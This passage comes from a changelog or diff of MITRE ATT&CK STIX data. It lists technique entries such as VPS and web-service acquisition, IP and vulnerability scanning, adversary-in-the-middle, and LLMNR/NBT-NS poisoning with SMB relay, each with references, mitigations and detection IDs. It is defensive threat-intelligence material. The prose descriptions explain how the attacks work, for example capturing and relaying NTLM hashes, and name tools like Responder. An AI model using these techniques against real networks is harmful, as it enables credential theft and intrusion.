+                            "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.",
+                            "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/"
+                        },
+                        {
+                            "source_name": "Koczwara Beacon Hunting Sep 2021",
+                            "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.",
+                            "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"
+                        },
+                        {
+                            "source_name": "Mandiant SCANdalous Jul 2020",
+                            "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/"
+                        },
+                        {
+                            "source_name": "ThreatConnect Infrastructure Dec 2020",
+                            "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
+                            "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
+                        },
+                        {
+                            "source_name": "NYTStuxnet",
+                            "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.",
+                            "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dor Edry, Microsoft"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2025-10-24 17:48:50.911000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0871: Detection of Server"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 00:44:23.935000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Virtual Private Server",
+                    "description": "Adversaries may rent Virtual Private Servers (VPSs)\u00a0that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1583/003",
+                            "external_id": "T1583.003"
+                        },
+                        {
+                            "source_name": "Koczwara Beacon Hunting Sep 2021",
+                            "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.",
+                            "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"
+                        },
+                        {
+                            "source_name": "TrendmicroHideoutsLease",
+                            "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.",
+                            "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf"
+                        },
+                        {
+                            "source_name": "Mandiant SCANdalous Jul 2020",
+                            "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/"
+                        },
+                        {
+                            "source_name": "ThreatConnect Infrastructure Dec 2020",
+                            "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
+                            "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2025-10-24 17:48:59.607000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0838: Detection of Virtual Private Server"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 00:50:29.936000+00:00",
+                    "modified": "2026-05-12 15:12:00.694000+00:00",
+                    "name": "Web Services",
+                    "description": "Adversaries may register for web services\u00a0that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google, GitHub, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29)(Citation: Hacker News GitHub Abuse 2024) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1583/006",
+                            "external_id": "T1583.006"
+                        },
+                        {
+                            "source_name": "Hacker News GitHub Abuse 2024",
+                            "description": "Dvir Sasson. (2024, May 13). GitHub Abuse Flaw Shows Why We Can't Shrug Off Abuse Vulnerabilities in Security. Retrieved March 31, 2025.",
+                            "url": "https://thehackernews.com/expert-insights/2024/05/github-abuse-flaw-shows-why-we-cant.html"
+                        },
+                        {
+                            "source_name": "FireEye APT29",
+                            "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024.",
+                            "url": "https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf"
+                        },
+                        {
+                            "source_name": "ThreatConnect Infrastructure Dec 2020",
+                            "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
+                            "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dor Edry, Microsoft",
+                        "Dvir Sasson, Reco"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.694000+00:00\", \"old_value\": \"2025-10-24 17:49:04.554000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0896: Detection of Web Services"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 16:54:23.193000+00:00",
+                    "modified": "2026-05-12 15:12:00.721000+00:00",
+                    "name": "Scanning IP Blocks",
+                    "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1595/001",
+                            "external_id": "T1595.001"
+                        },
+                        {
+                            "source_name": "Botnet Scan",
+                            "description": "Dainotti, A. et al. (2012). Analysis of a \u201c/0\u201d Stealth Scan from a Botnet. Retrieved October 20, 2020.",
+                            "url": "https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Diego Sappa, Securonix"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.721000+00:00\", \"old_value\": \"2025-10-24 17:49:28.603000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0817: Detection of Scanning IP Blocks"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 16:55:16.047000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Vulnerability Scanning",
+                    "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1595/002",
+                            "external_id": "T1595.002"
+                        },
+                        {
+                            "source_name": "OWASP Vuln Scanning",
+                            "description": "OWASP. (n.d.). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.",
+                            "url": "https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2025-10-24 17:48:48.647000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0867: Detection of Vulnerability Scanning"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 19:07:12.114000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Adversary-in-the-Middle",
+                    "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1689)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to impair defenses and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1557",
+                            "external_id": "T1557"
+                        },
+                        {
+                            "source_name": "dns_changer_trojans",
+                            "description": "Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.",
+                            "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats"
+                        },
+                        {
+                            "source_name": "volexity_0day_sophos_FW",
+                            "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.",
+                            "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"
+                        },
+                        {
+                            "source_name": "taxonomy_downgrade_att_tls",
+                            "description": "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.",
+                            "url": "https://arxiv.org/abs/1809.05681"
+                        },
+                        {
+                            "source_name": "ad_blocker_with_miner",
+                            "description": "Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.",
+                            "url": "https://securelist.com/ad-blocker-with-miner-included/101105/"
+                        },
+                        {
+                            "source_name": "Token tactics",
+                            "description": "Microsoft Incident Response. (2022, November 16). Token tactics: How to prevent, detect, and respond to cloud token theft. Retrieved December 26, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/"
+                        },
+                        {
+                            "source_name": "mitm_tls_downgrade_att",
+                            "description": "praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.",
+                            "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"
+                        },
+                        {
+                            "source_name": "Rapid7 MiTM Basics",
+                            "description": "Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.",
+                            "url": "https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/"
+                        },
+                        {
+                            "source_name": "tlseminar_downgrade_att",
+                            "description": "Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.",
+                            "url": "https://tlseminar.github.io/downgrade-attacks/"
+                        },
+                        {
+                            "source_name": "ttint_rat",
+                            "description": "Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.",
+                            "url": "https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Mayuresh Dani, Qualys",
+                        "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project",
+                        "NEC"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-17 14:18:32.903000+00:00\"}}}",
+                    "previous_version": "2.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1030: Network Segmentation",
+                            "M1031: Network Intrusion Prevention",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1037: Filter Network Traffic",
+                            "M1041: Encrypt Sensitive Information",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0296: Detect Adversary-in-the-Middle via Network and Configuration Anomalies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 19:08:51.677000+00:00",
+                    "modified": "2026-05-12 15:12:00.636000+00:00",
+                    "name": "Name Resolution Poisoning and SMB Relay",
+                    "description": "By responding to LLMNR/NBT-NS/mDNS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system.(Citation: BlackCat ransomware) This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name.(Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)\n\nMulticast Domain Name System(mDNS) is a zero-configuration service used to resolve hostnames to IP addresses with \u201c.local\u201d as a top-level domain. MDNS is based upon Domain Name System (DNS) format and allows hosts on the same network segment to perform name resolution for other hosts, using multicast.(Citation: mDNS RFC)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137)/mDNS (UDP 5353) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\n\nIn some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various other protocols, such as LDAP, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.\u00a0\n\nSeveral tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1557/001",
+                            "external_id": "T1557.001"
+                        },
+                        {
+                            "source_name": "Rapid7 LLMNR Spoofer",
+                            "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.",
+                            "url": "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response"
+                        },
+                        {
+                            "source_name": "GitHub Responder",
+                            "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.",
+                            "url": "https://github.com/SpiderLabs/Responder"
+                        },
+                        {
+                            "source_name": "Secure Ideas SMB Relay",
+                            "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.",
+                            "url": "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html"
+                        },
+                        {
+                            "source_name": "BlackCat ransomware",
+                            "description": "Lucas Silva, Leandro Froes. (2022, April 18). An Investigation of the BlackCat Ransomware via Trend Micro Vision One. Retrieved February 2, 2026.",
+                            "url": "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html"
+                        },
+                        {
+                            "source_name": "TechNet NetBIOS",
+                            "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.",
+                            "url": "https://technet.microsoft.com/library/cc958811.aspx"
+                        },
+                        {
+                            "source_name": "GitHub NBNSpoof",
+                            "description": "Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.",
+                            "url": "https://github.com/nomex/nbnspoof"
+                        },
+                        {
+                            "source_name": "mDNS RFC",
+                            "description": "S. Cheshire, M. Krochmal. (2013, February). Multicast DNS. Retrieved February 2, 2026.",
+                            "url": "https://datatracker.ietf.org/doc/html/rfc6762"
+                        },
+                        {
+                            "source_name": "byt3bl33d3r NTLM Relaying",
+                            "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.",
+                            "url": "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html"
+                        },
+                        {
+                            "source_name": "Wikipedia LLMNR",
+                            "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Eric Kuehn, Secure Ideas",
+                        "Matthew Demaske, Adaptforward",
+                        "Andrew Allen, @whitehat_zero",
+                        "Arad Inbar"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.636000+00:00\", \"old_value\": \"2026-02-03 16:53:09.295000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1030: Network Segmentation",
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0462: Detect LLMNR/NBT-NS Poisoning and SMB Relay on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
